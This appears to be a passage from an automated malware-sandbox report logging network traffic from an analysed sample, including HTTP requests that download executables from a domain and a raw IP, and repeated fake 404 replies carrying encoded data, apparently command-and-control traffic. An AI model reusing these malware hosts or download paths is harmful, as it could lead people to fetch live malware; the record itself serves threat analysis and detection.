                        Source: global trafficHTTP traffic detected: GET /files/2264_1640622147_2258.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                        Source: global trafficHTTP traffic detected: GET /stlr/maps.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.243.44.128
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:22:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:22:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:22:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:22:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:22:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:22:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:02 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 28 Dec 2021 02:22:19 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c8 89 40 0e 65 1b e4 bf c1 b1 a2 14 a5 08 cd 2c b4 59 52 db 17 f8 ee 39 ec 3f 52 17 b2 ea 93 42 fe 02 86 1c 80 a7 70 9b 77 a7 f9 0d 0a 30 0d 0a 0d 0a Data Ascii: 3eI:82O@e,YR9?RBpw0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 